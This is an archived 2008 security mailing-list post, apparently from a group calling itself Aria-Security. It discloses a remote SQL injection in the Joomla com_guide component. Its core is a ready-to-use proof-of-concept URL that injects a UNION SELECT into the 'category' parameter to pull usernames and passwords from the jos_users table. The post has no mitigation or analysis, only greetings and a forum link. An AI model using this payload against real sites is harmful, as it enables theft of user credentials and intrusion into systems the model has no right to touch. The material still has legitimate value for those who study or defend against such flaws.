OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
Joomla components com_guide "category" Remote SQL Injection [Aria-Security]

no-replyAria-security.net
Date: Sat Mar 15 2008 - 18:56:22 CDT

Aria-Security Team (Persian Security Network)
http://forum.aria-security.com
--------------------------------
Join our english forum http://forum.aria-security.com
Shoutz: Aura, Null, Kinglet, t3rr0r1st
Joomla components com_guide "category" Remote SQL Injection

Poc:

index.php?option=com_guide&category=-999999/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*

Regards,
The-0utl4w
Edit/Delete Message